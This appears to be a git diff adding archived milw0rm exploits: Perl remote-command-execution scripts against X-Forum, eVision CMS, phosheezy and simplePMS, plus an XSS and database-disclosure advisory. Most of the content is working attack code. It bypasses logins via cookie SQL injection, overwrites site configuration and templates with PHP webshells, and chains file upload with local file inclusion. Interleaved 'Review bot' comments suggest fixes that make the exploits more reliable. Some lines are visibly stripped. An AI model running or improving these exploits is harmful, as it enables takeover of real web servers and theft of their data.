@@ -0,0 +1,317 @@ +#!/usr/bin/perl + +# Web App: X-Forum 0.6.2 +# Link : http://freefr.dl.sourceforge.net/sourceforge/x-forum/xforum-0.6.2.tar.gz +# Bug : Auth Bypass via Cookie Handling +# : There are also other SQL Injections + +# Remote Command Execution Exploit +# Credits to Giovanni Buzzin, "Osirys" +# Mail osirys[at]autistici[dot]org + +# It logs in using an SQL Inj (AUTH BYPASS) via Cookie, then edits the configuration +# putting in it the backdoor. Needs the nick of the admin ! + +# --------------------------------------------------------------------------- +# Sploit +# --------------------------------------------------------------------------- +# osirys[~]>$ perl spll.txt http://localhost/x-forum/xforum/ admin +# +# ---------------------------- +# X-Forum RCE Exploit +# Coded by Osirys +# ---------------------------- +# +# [*] Bypassing Admin Login with a evil cookie ! +# [*] Admin Login Bypassed .. +# [*] Getting previous configuration .. +# [*] Previous configuration loaded .. +# [*] Overwriting ..... +# [*] Configuration edited, backdoored !! +# [*] Shell succesfully spawned !! +# [:D Hi myLord, execute your commands !! +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/x-forum/xforum +# shell[localhost]$> exit +# [-] Quitting .. 
+# +# osirys[~]>$ +# --------------------------------------------------------------------------- + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; + +my $host = $ARGV[0]; +my $user = $ARGV[1]; +my $rce_p = "/Config.php?cmd="; +my @conf = (); + +chomp($user); +$user =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; +$user =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; + +$cookie = "cookie_username=".$user."' or '1=1; cookie_password=p0wa"; + +help("-1") unless (($host)&&($user)); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_data($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Bypassing Admin Login with a evil cookie !\n"; +socket_req("GET",$path."/Configure.php",$cookie,"Manage Boards",1); +if ($gotcha == 1) { + print "[*] Admin Login Bypassed ..\n"; +} +else { + print "[-] Bad admin's nick or site not vulnerable !\nn"; + exit(0); +} +print "[*] Getting previous configuration ..\n"; +socket_req("GET",$path."/Configure.php",$cookie,"",2); + +if (scalar(@conf) == 23) { + print "[*] Previous configuration loaded ..\n"; +} +print "[*] Overwriting .....\n"; + +my $post = "serverName=".$conf[0]."&userName=".$conf[1]."&password=".$conf[2]."&databaseName=".$conf[3]. + "&iconsDir=".$conf[4]."&buttonsDir=".$conf[5]."&emailPassword=FALSE&uniqueEMail=TRUE&member". + "Level=0&memberStatus=1&memberGroup=1&threadStatus=1&postStatus=1&forumName=".$conf[6]."&ic". + "onsPerRow=".$conf[7]."&boardImage=". $conf[8]."&boardImageNew=". $conf[9] ."&categoryImage=" + .$conf[10] ."&categoryImageNew=" . $conf[11] ."&threadImage=". $conf[12] . "&threadImageNew=" + .$conf[13]."&backColor=".$conf[14]."&textColor=".$conf[15]."&fontFace=".$conf[16]."&linkCol". + "or=".$conf[17]."&borderColor=". $conf[18]."&titleColor=".$conf[19]."&bodyColor=". $conf[20]. + "&adminEMail=".$conf[21]."%22%29%3Becho+%22sp4wn%3Cbr%3E%22%3Bsystem%28%24_GET%5Bcmd%5D%29%". 
+ "3Bdefine%28%22p0wa%22%2C%22lol&logoutURL=".$conf[22]."&submit=Update+Configuration"; + + +$post =~ s/,/%2C/g; +$post =~ s/ /+/g; +$post =~ s/#/%23/g; +$post =~ s/@/%40/g; + +socket_req("POST",$path."/SaveConfig.php",$cookie,$post,0,"",1); + +my $exec_url = ($host.$rce_p); +my $re = get_req($exec_url); +if ($re =~ /sp4wn/) { + print "[*] Configuration edited, backdoored !!\n[*] Shell succesfully spawned !!\n[:D Hi myLord, execute your commands !!\n\n"; + &exec_cmd; +} +else { + print "[-] Something wrong, sploit failed !\n\n"; + exit(0); +} + +sub socket_req() { + my($request,$path,$cookie,$content,$opt,$regexp,$sock_opt) = @_; + my $stop; + my $length = length($content); + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + if ($sock_opt == 1) { + $opt_1 = "Referer: ".$host."/Configure.php\r\n"; + $opt_2 = "Content-Type: application/x-www-form-urlencoded\r\n"; + } + else { + $opt_1 = ""; + $opt_2 = ""; + } + my $data = $request." ".$path." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + $opt_1. + "Cookie: ".$cookie."\r\n". + $opt_2. + "Content-Length: ".$length."\r\n\r\n". + $content."\r\n"; + + $socket->send($data); + while ((my $e = <$socket>)&&($stop != 1)) { + if ($opt == 0) { + $stop = 1; + } + elsif ($opt == 1) { + if ($e =~ /$regexp/) { + ($stop,$gotcha) = (1,1); + } + } + elsif ($opt == 2) { + get_previous_conf($e); + } + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $host.$rce_p.$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/sp4wn
(.+)/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_data() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $h0st !~ /www/ || $h0st =~ s/www\.//; + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub get_previous_conf() { + my $string = $_[0]; + if ($string =~ /name="serverName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="userName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="password" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="databaseName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="iconsDir" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="buttonsDir" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="forumName" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="iconsPerRow" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="boardImage" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="boardImageNew" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="categoryImage" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="categoryImageNew" size="60" value="(.+)">/) 
{ + push(@conf,$1); + } + elsif ($string =~ /name="threadImage" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="threadImageNew" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="backColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="textColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="fontFace" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="linkColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="borderColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="titleColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="bodyColor" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="adminEMail" size="60" value="(.+)">/) { + push(@conf,$1); + } + elsif ($string =~ /name="logoutURL" size="60" value="(.+)">/) { + push(@conf,$1); + } +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " ---------------------------- \n". + " X-Forum RCE Exploit \n". + " Coded by Osirys \n". + " ---------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad Input!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_username\n"; + print " admin_username is the nick of the admin.\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/eVision CMS 2.0 - Remote Code Execution.pl b/eVision CMS 2.0 - Remote Code Execution.pl new file mode 100644 index 0000000..29ad08f --- /dev/null +++ b/eVision CMS 2.0 - Remote Code Execution.pl 
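Review bot: After `socket_req(...,2)` loads the existing settings the script only prints `Previous configuration loaded` when `scalar(@conf) == 23` and then builds the `SaveConfig.php` POST from `$conf[0..22]` regardless; since every `get_previous_conf` pattern requires `value="(.+)">`, an empty field (or one containing `"`) is silently skipped, the indices shift, and the target's live config — `userName`, `password`, `databaseName` included — is overwritten with the wrong values, breaking the forum instead of backdooring it. It should refuse to continue: `scalar(@conf) == 23 or die "[-] Got ".scalar(@conf)." of 23 config fields, refusing to overwrite\n";`. Separately, `get_data` matches the host with `[a-z.]{1,30}` where the sibling scripts use `[a-z.-]`, so any hostname with digits or hyphens (every IP address) is mis-split; `$s_host =~ /([a-z0-9.-]{1,30})\/(.*)/;` fixes that. `$cmd = ;` in `exec_cmd` is a syntax error as written — presumably `<STDIN>` was stripped when the listing was rendered.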
@@ -0,0 +1,189 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------- + +# eVision CMS 2.0 +# http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz +# Remote Command Execution Exploit +# by Osirys +# osirys[at]live[dot]it +# Greets to: evilsocket, DarkJoker, emgent, Jay and str0ke + +# This cms is vulnerable to arbitrary file upload. The problem is that when +# the user uploads a file, on it will be added the .gif extension. but this +# cms is vulnerable to Local File Inclusion,so we can include the .gif file +# and execute it. + +# ------------------------------------------------------------------ +# Exploit in action :D +# ------------------------------------------------------------------ +# osirys[~]>$ perl rcE.txt http://localhost/eVision-2.0/ +# +# --------------------------- +# eVision CMS RCE Exploit +# Coded by Osirys +# --------------------------- + +# [+] Evil php code uploaded ! +# [+] Including now evil file with LFI vulnerability +# [+] Injection succesfully ! Remote Command execution works ! + +# shell[localhost]$> whoami +# apache +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/eVision-2.0/modules/tour/adminpart +# shell[localhost]$> exit +# [-] Quitting .. 
+# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $img_up_path = "/modules/brandnews/adminpart/img_upload.php"; +my $up_path = "/modules.conf/brandnews/showpart/icons/"; +my $lfi_path = "/modules/tour/adminpart/addtour.php?module="; +my $rce_path = "../../../modules.conf/brandnews/showpart/icons/"; +my $vuln_code = ""; +my $lfile = "osi.txt"; +my $nfile = "osirys.txt"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +open ($file, ">>", $lfile); +print $file "$vuln_code\n"; +close($file); + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +my $url = $host.$img_up_path; +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url, + Content_Type => 'form-data', + Content => [ + upload_img => [$lfile, Content_Type => 'text/plain'], + upload_label => $nfile, + upload_submit => 'Upload' + ] + ); + +unlink($lfile); + +if ($re->is_success){ + my $t_re = get_req($host.$up_path.$nfile.".gif"); + if ($t_re =~ /<\?php/) { + print "[+] Evil php code uploaded !\n"; + print "[+] Including now evil file with LFI vulnerability\n"; + my $re = get_req($host.$lfi_path.$rce_path.$nfile.".gif%00&cmd=id"); + if ($re =~ /uid/) { + print "[+] Injection succesfully ! 
Remote Command execution works !\n\n"; + $lfi_rce = $host.$lfi_path.$rce_path.$nfile.".gif%00&cmd="; + &exec_cmd; + } + else { + print "[-] Something goes wrong !\n"; + print "[-] Exploit Failed\n\n"; + exit(0); + } + } + else { + print "[-] Upload failed\n"; + print "[-] Exploit Failed\n\n"; + exit(0); + } +} +else { + print "[-] Unable to upload evil file !\n"; + print "[-] Exploit Failed\n\n"; + exit(0); +} + +sub exec_cmd { + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($lfi_rce.$cmd); + $re = get_req($exec_url); + if ($re =~ /(.)/) { + push(@outs,$re); + foreach my $o(@outs) { + print "$o"; + } + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------- \n". + " eVision CMS RCE Exploit \n". + " Coded by Osirys \n". + " --------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-02] \ No newline at end of file 
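Review bot: `my $vuln_code = "";` is empty, so the file produced by `open ($file, ">>", $lfile); print $file "$vuln_code\n";` holds a single newline and the upload check `if ($t_re =~ /<\?php/)` can never succeed — the PHP payload was presumably stripped as markup when the listing was rendered, as was `<STDIN>` in `$cmd = ;`, which is a syntax error as written. The open is also unchecked and in append mode, so a leftover `osi.txt` from an earlier run is re-uploaded with stale content appended; use `open(my $fh, '>', $lfile) or die "[-] Can't write $lfile: $!\n";` and print/close on `$fh`. Finally, `exec_cmd` treats any response matching `/(.)/` as command output, so an error page is printed as if the command ran; match on a marker emitted by the payload instead, as the `0xExec`/`sp4wn` checks in the sibling scripts do.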
diff --git a/myPHPscripts Login Session 2.0 - Cross-Site Scripting Database Disclosure.txt b/myPHPscripts Login Session 2.0 - Cross-Site Scripting Database Disclosure.txt new file mode 100644 index 0000000..f85adff --- /dev/null +++ b/myPHPscripts Login Session 2.0 - Cross-Site Scripting Database Disclosure.txt 
@@ -0,0 +1,76 @@
+[START]
+
+####################################################################################################################
+[0x01] Informations:
+
+Script : myPHPscripts Login Session 2.0
+Download : http://www.hotscripts.com/jump.php?listing_id=69881&jump_type=1
+Vulnerability : XSS / Database Disclosure
+Author : Osirys
+Contact : osirys[at]live[dot]it
+Website : http://osirys.org
+Notes : Proud to be Italian
+Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+
+####################################################################################################################
+[0x02] Bug: [XSS]
+######
+
+Bugged file is: /[path]/login.php
+
+[CODE]
+
+if ($u_invalid == 1) { $errors[] = "User $user is invalid. 3-15 alphanumeric characters required."; }
+
+[/CODE]
+
+If the username that we typed in the register form is invalid, it will directly appear in the html code.
+So we just have to put a js code, like an alert, and we will get a XSS.
+
+[!] FIX: Filter or validate $user before printing it in html code.
+
+
+[!] EXPLOIT:
+ 1) Go at: /[path]/login.php?ls_register
+ 2) In User form put a js code. (ex: )
+ 3) Field the other forms, and press register button.
+
+####################################################################################################################
+[0x03] Bug: [Database Disclosure]
+######
+
+Bugged file is: /[path]/login.php
+
+[CODE]
+
+ if (empty($errors)) {
+ $newline = $records++;
+ $e_email = base64_encode($email);
+ $data = "$newline||$user||$e_email||$pass\n";
+ $fh = fopen($users, 'a') or die("Can't open user database.");
+ fwrite($fh, $data);
+ fclose($fh);
+?>
+
+[/CODE]
+
+This cms uses a flat database, a .txt file where it stores usernames,passwords and emails of the registered
+users.
+
+[!] FIX: Don't use this kind of authentication :)
+
+
+[!] EXPLOIT: /[path]/users.txt
+
+ Informations are printed in this way:
+ 0||admin||b3NpcnlzQGxpdmUuaXQ=||6e1459df459890dfd8b4c3687c18abba
+ 1||cazzone||bG9sQGxvbC5pdA==||b7dba5a1bc3605a87b59ac8147512c97
+
+ user_number||username||email(base64 encrypted)||password(md5 encrypted)
+
+####################################################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-19]
\ No newline at end of file
diff --git a/phosheezy 2.0 - Remote Command Execution.pl b/phosheezy 2.0 - Remote Command Execution.pl
new file mode 100644
index 0000000..e01a66c
--- /dev/null
+++ b/phosheezy 2.0 - Remote Command Execution.pl
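Review bot: The XSS fix line in [0x02] ("Filter or validate $user") leaves the actual remediation unstated, and input validation cannot help here because this `$errors[]` branch runs precisely when validation has already failed; the quoted line needs output encoding, e.g. `$errors[] = "User " . htmlspecialchars($user, ENT_QUOTES, 'UTF-8') . " is invalid. 3-15 alphanumeric characters required.";`. The step-2 example payload in the EXPLOIT list is empty in this text (`(ex: )`), so the reproduction is incomplete as written. In [0x03] the column legend calls base64 and MD5 "encrypted": base64 is reversible encoding, so the e-mail column is plaintext-equivalent, and an unsalted MD5 digest is offline-crackable, so the FIX line should give the mitigation the quoted code supports — keep the `$users` file outside the document root or deny it in the web server configuration, and store a salted, slow password hash. Whether `$pass` is already an MD5 digest at the point of `fwrite` is not visible in the snippet; it is inferred only from the sample rows.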
@@ -0,0 +1,211 @@ +#!/usr/bin/perl + +# phosheezy 2.0 +# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz +# Remote Command Execution Exploit +# by Osirys +# osirys[at]live[dot]it +# osirys.org +# Greets: r00t, x0r, jay, BlackLight +# lol at athos + +# -------------------------------------------------------------- +# Exploit in action :D +# -------------------------------------------------------------- +# osirys[~]>$ perl exp.txt http://localhost/phosheezy/ +# +# ---------------------------- +# Phosheezy RCE Exploit +# Coded by Osirys +# ---------------------------- +# +# [+] Admin password found: +# Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c +# [+] Grabbing server headers to get a valid SESSION ID .. +# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2 +# [+] Succesfully logged in as Administrator +# [+] Template edited, RCE Vulnerability Created ! +# shell$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell$> exit +# [-] Quitting .. +# osirys[~]>$ +# -------------------------------------------------------------- + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; + +my $host = $ARGV[0]; +my $pwd_path = "/config/password"; +my $adm_path = "/admin.php"; +my $templ_path = "/admin.php?action=3"; + +help("-1") unless ($host); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_data($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $url = $host.$pwd_path; +my $re = get_req($url); + +if ($re =~ /([0-9a-f]{40})/) { + $password = $1; + print "[+] Admin password found:\n"; + print " Sha1 pwd: $password \n"; + adm_log($password); +} +else { + print "[-] Unable to get sha1 Admin password\n\n"; + exit(0); +} + +sub adm_log() { + my $password = $_[0]; + my $link = $path.".".$adm_path; + my $post = "password=$password&Login=Login"; + my $length = length($post); + my @data; + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + my $data = "POST ".$link." 
HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $post."\r\n"; + + $socket->send($data); + print "[+] Grabbing server headers to get a valid SESSION ID ..\n"; + + while (my $e = <$socket>) { + push(@data,$e); + } + foreach my $e(@data) { + if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) { + $log_ = 1; + print "[+] Succesfully logged in as Administrator\n"; + } + elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) { + $phpsessid = $1; + print "[+] SESSION ID grabbed: $phpsessid\n"; + } + } + + (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n"; + RCE_create($phpsessid); +} + +sub RCE_create() { + my $phpsessid = $_[0]; + my $link = $path.".".$templ_path; + my $code = "header=Ryneezy PhoSheezy</tit". + "le></head><body bgcolor=\"#ffffff\" text=\"#0000". + "00\">&footer=</body></html><!-- cmd --><?php sys". + "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout"; + my $length = length($code); + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + my $data = "POST ".$link." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + "$code\r\n"; + + $socket->send($data); + + while (my $e = <$socket>) { + if ($e =~ /Edit layout again/) { + $rce_c = 1; + print "[+] Template edited, RCE Vulnerability Created !\n"; + } + } + + $rce_c == 1 || die "[-] Can't edit Template. 
Exploit failed\n\n"; + &exec_cmd; +} + +sub exec_cmd { + print "shell\$> "; + $cmd = <STDIN>; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host."/index.php?cmd=".$cmd); + $re = get_req($exec_url); + if ($re =~ /<!-- cmd -->(.*)/) { + my $cmd = $1; + $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/; + print "$cmd\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_data() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $h0st !~ /www/ || $h0st =~ s/www\.//; + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " ---------------------------- \n". + " Phosheezy RCE Exploit \n". + " Coded by Osirys \n". + " ---------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you provide a hostname address!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/simplePms CMS 0.1.4 - Local File Inclusion Remote Command Execution.pl b/simplePms CMS 0.1.4 - Local File Inclusion Remote Command Execution.pl new file mode 100644 index 0000000..27d32b4 --- /dev/null +++ b/simplePms CMS 0.1.4 - Local File Inclusion Remote Command Execution.pl 
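Review bot: In exec_cmd the command read from STDIN is pasted into the URL unchanged — it is never chomped and nothing is percent-encoded, so a command containing a space, `&`, `#` or `+` is truncated or mis-parsed server-side; `chomp $cmd; $exec_url = $host."/index.php?cmd=".uri_escape($cmd);` with `use URI::Escape;` (shipped with LWP's URI dependency) fixes this. The output match `/<!-- cmd -->(.*)/` has no `/s`, so multi-line output such as `ls` is cut to its first line; `/<!-- cmd -->(.*?)<!--cmd-->/s` captures the whole block. The raw-socket requests in adm_log and RCE_create send HTTP/1.1 without a `Connection: close` header and then read the socket until EOF, so on a keep-alive server each `while (<$socket>)` loop presumably blocks until the server's idle timeout — add `"Connection: close\r\n"` to both request strings. RCE_create also overwrites the live layout template with the backdoor and nothing restores it, so a run against a real target leaves a persistent webshell until `admin.php?action=3` is cleaned up by hand. The script has no `use strict; use warnings;`, which is why the undeclared globals `$log_`, `$phpsessid` and `$rce_c` go unnoticed.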
@@ -0,0 +1,170 @@ +#!/usr/bin/perl + +# Script : simplePMS CMS v0.1.3a +# Download: http://garr.dl.sourceforge.net/sourceforge/simplepms/simplePMS-v0-1-3prealpha.tar.bz2 +# Remote Command Execution Exploit +# Also affected to multiple LFI vulnerabilities <-- Needs Register Globals ON ($filename not declared) +# /[path]/pages/template.php?filename=[lf]%00 +# /[path]/pages/comp-template.php?filename=[lf]%00 +# by Osirys <osirys[at]autistici[dot]org> + +# Let's go into the hacking .. + +# osirys[~]>$ perl rcex.txt http://localhost/simplePMS-v0-1-3prealpha/ +# +# --------------------------------------- +# SimplePMS CMS v0.1.3a +# Remote Command Execution Sploit +# by Osirys +# --------------------------------------- +# +# [*] Adding evil post .. +# [*] Succesfully backdoored ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/simplePMS-v0-1-3prealpha/posts +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $host = $ARGV[0]; +my $rand = int(rand 19) +1; +my $file = "h0x".$rand; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $url = $path."/post-create.php"; + +my $code = "insert=Before&filename=".$file."&topic=1337&story=owned%22%3Be". + "cho+%22p0w%22%3Bif%28get_magic_quotes_gpc%28%29%29%7B+%24_GET%". + "5Bcmd%5D%3Dstripslashes%28%24_GET%5Bcmd%5D%29%3B%7Dsystem%28%2". + "4_GET%5Bcmd%5D%29%3Becho+%22p0w%22%3B%24a+%3D+%22o&poster=owner"; + +my $length = length($code); + +my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". 
+ $code."\r\n"; + +my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + +print "[*] Adding evil post ..\n"; +$socket->send($data); + +while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /Sucessfully created post for/) { + $own = 1; + print "[*] Succesfully backdoored ! \n"; + } +} +$own == 1 || die "[-] Can't add posts !\n"; + +print "[&] Hi my master, do your job now [!]\n\n"; +&exec_cmd; + +sub exec_cmd { + my(@outs,$out); + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = <STDIN>; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host."/posts/".$file."-posts.php?cmd=".$cmd; + $re = get_req($exec_url); + $content = tag($re); + if ($content =~ /p0w(.+)p0w/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/\n/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------------- \n". + " SimplePMS CMS v0.1.3a \n". + " Remote Command Execution Sploit \n". + " by Osirys \n". 
+ " --------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/wPortfolio 0.3 - Arbitrary File Upload.pl b/wPortfolio 0.3 - Arbitrary File Upload.pl new file mode 100644 index 0000000..c0721b2 --- /dev/null +++ b/wPortfolio 0.3 - Arbitrary File Upload.pl 
